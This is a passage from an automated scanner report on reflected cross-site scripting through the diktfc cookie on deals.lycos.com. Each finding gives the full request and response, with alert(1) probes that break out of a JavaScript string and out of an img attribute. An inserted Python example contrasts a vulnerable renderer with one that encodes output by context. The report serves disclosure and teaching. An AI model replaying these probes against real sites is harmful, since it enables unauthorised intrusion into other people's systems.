Content-Type: text/html; charset=utf-8
Content-Length: 17720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abd5d1";alert(1)//99923b16c8b"
});
</script>
...[SNIP]...

1.158. http://deals.lycos.com/deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa21f"><script>alert(1)</script>c82f0e9250f was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaa21f"><script>alert(1)</script>c82f0e9250f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:12 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
//b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaa21f"><script>alert(1)</script>c82f0e9250f&amp;cj=1" alt="tracker" />
...[SNIP]...

1.159. http://deals.lycos.com/deal/canon-eos-60d-18mp-dslr-body-899-413793 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/canon-eos-60d-18mp-dslr-body-899-413793

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 830f7"%3balert(1)//a3a48905539 was submitted in the diktfc cookie. This input was echoed as 830f7";alert(1)//a3a48905539 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/canon-eos-60d-18mp-dslr-body-899-413793 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A830f7"%3balert(1)//a3a48905539; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/canon-eos-60d-18mp-dslr-body-899-413793",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A830f7";alert(1)//a3a48905539"
});
</script>
...[SNIP]...

1.160. http://deals.lycos.com/deal/canon-eos-60d-18mp-dslr-body-899-413793 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/canon-eos-60d-18mp-dslr-body-899-413793

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26ef0"><script>alert(1)</script>8b18dd23c04 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/canon-eos-60d-18mp-dslr-body-899-413793 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A26ef0"><script>alert(1)</script>8b18dd23c04; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
rc="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/canon-eos-60d-18mp-dslr-body-899-413793&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A26ef0"><script>alert(1)</script>8b18dd23c04&amp;cj=1" alt="tracker" />
...[SNIP]...

1.161. http://deals.lycos.com/deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8507a"%3balert(1)//42fd6a583c was submitted in the diktfc cookie. This input was echoed as 8507a";alert(1)//42fd6a583c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8507a"%3balert(1)//42fd6a583c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8507a";alert(1)//42fd6a583c"
});
</script>
...[SNIP]...

1.162. http://deals.lycos.com/deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a778"><script>alert(1)</script>da4cec6ed03 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7a778"><script>alert(1)</script>da4cec6ed03; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
/b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7a778"><script>alert(1)</script>da4cec6ed03&amp;cj=1" alt="tracker" />
...[SNIP]...

1.163. http://deals.lycos.com/deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b224"><script>alert(1)</script>91319e796f3 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2b224"><script>alert(1)</script>91319e796f3; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:43 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2b224"><script>alert(1)</script>91319e796f3&amp;cj=1" alt="tracker" />
...[SNIP]...

1.164. http://deals.lycos.com/deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82444"%3balert(1)//6b826531f72 was submitted in the diktfc cookie. This input was echoed as 82444";alert(1)//6b826531f72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A82444"%3balert(1)//6b826531f72; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:45 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A82444";alert(1)//6b826531f72"
});
</script>
...[SNIP]...
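The two sinks recorded in 1.163 and 1.164 (the diktfc cookie copied into the comScore <img src> attribute, and into the c15 JavaScript string of the COMSCORE.beacon() call), modelled as an added example that is not code from this report or from Lycos. It puts a vulnerable renderer beside a version encoded per output context, and adds a context classifier of the kind a scanner uses to label where a probe lands and to mark the finding "Certain". The page templates, function names and the assumption that the server URL-decodes the cookie before use (consistent with "%3b" sent and ";" echoed in 1.164) are the example's own; the probe strings, cookie value and deal path are copied from the report.

```python
# Added example (not code from the XSS.CX report or from Lycos). It models the
# two diktfc sinks shown in findings 1.163 and 1.164 and a scanner-style
# context check. Templates and function names are assumptions.
import html
import json
from urllib.parse import quote, unquote

# Constructed from the report: the cookie's normal value, the two probes the
# scanner submitted, and the deal path they were submitted against.
BASE = "013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A"
PATH = "deals.lycos.com/deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306"
ATTR_PROBE = '2b224"><script>alert(1)</script>91319e796f3'
JS_PROBE_SENT = '82444"%3balert(1)//6b826531f72'     # as sent in the Cookie header
JS_PROBE_ECHOED = '82444";alert(1)//6b826531f72'     # as echoed (server URL-decoded it)


def render_vulnerable(diktfc_cookie: str, path: str) -> str:
    """Cookie value copied raw into an <img src> attribute and a JS string.

    Assumption: the server URL-decodes the cookie before use, which is what
    the report shows ("%3b" sent, ";" echoed).
    """
    value = unquote(diktfc_cookie)
    img = ('<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445'
           '&amp;c4=' + path + '&amp;c15=' + value + '&amp;cj=1" alt="tracker" />')
    script = ('<script type="text/javascript">\nCOMSCORE.beacon({\n'
              'c4:"' + path + '",\nc15:"' + value + '"\n});\n</script>')
    return img + "\n" + script


def js_string_literal(value: str) -> str:
    """Double-quoted JS string literal safe to embed inside a <script> block."""
    # JSON escaping handles quotes and backslashes; '<' and '>' are escaped too
    # so a "</script>" in the value cannot terminate the block early.
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def render_safe(diktfc_cookie: str, path: str) -> str:
    """Same two sinks, with encoding chosen per output context."""
    value = unquote(diktfc_cookie)
    # URL inside an attribute: percent-encode the query component first, then
    # entity-encode the attribute value (quote=True also encodes '"').
    c4_attr = html.escape(quote(path, safe="/"), quote=True)
    c15_attr = html.escape(quote(value, safe=""), quote=True)
    img = ('<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445'
           '&amp;c4=' + c4_attr + '&amp;c15=' + c15_attr + '&amp;cj=1" alt="tracker" />')
    script = ('<script type="text/javascript">\nCOMSCORE.beacon({\n'
              'c4:' + js_string_literal(path) + ',\n'
              'c15:' + js_string_literal(value) + '\n});\n</script>')
    return img + "\n" + script


def context_at(body: str, idx: int) -> str:
    """Classify the markup context at offset idx: 'js', 'attribute' or 'text'."""
    before = body[:idx]
    if before.rfind("<script") > before.rfind("</script>"):
        return "js"
    if before.rfind("<") > before.rfind(">"):
        return "attribute"
    return "text"


def find_reflections(body: str, probe: str) -> list:
    """Contexts in which probe appears byte-for-byte (the scanner's 'Certain')."""
    found, start = [], 0
    while (idx := body.find(probe, start)) >= 0:
        found.append(context_at(body, idx))
        start = idx + len(probe)
    return found


if __name__ == "__main__":
    for label, sent, echoed in (("attribute probe", ATTR_PROBE, ATTR_PROBE),
                                ("js-string probe", JS_PROBE_SENT, JS_PROBE_ECHOED)):
        print(label, "vulnerable:", find_reflections(render_vulnerable(BASE + sent, PATH), echoed))
        print(label, "hardened:  ", find_reflections(render_safe(BASE + sent, PATH), echoed))
```

Run stand-alone, the vulnerable renderer reports each probe in both the attribute and the JS-string context (one cookie value feeds both sinks, which is why the report lists two findings per deal page), while the hardened renderer reports neither. The hardening keeps the same page output for ordinary hex cookie values; only the metacharacters change representation.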

1.165. http://deals.lycos.com/deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f1d2"%3balert(1)//3b0a90ac364 was submitted in the diktfc cookie. This input was echoed as 3f1d2";alert(1)//3b0a90ac364 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3f1d2"%3balert(1)//3b0a90ac364; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
script">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3f1d2";alert(1)//3b0a90ac364"
});
</script>
...[SNIP]...

1.166. http://deals.lycos.com/deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3028"><script>alert(1)</script>900481f7494 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac3028"><script>alert(1)</script>900481f7494; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac3028"><script>alert(1)</script>900481f7494&amp;cj=1" alt="tracker" />
...[SNIP]...

1.167. http://deals.lycos.com/deal/dell-financial-services-25-off-laptops-more-414325 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-financial-services-25-off-laptops-more-414325

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e7bd"><script>alert(1)</script>9753846fcc9 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

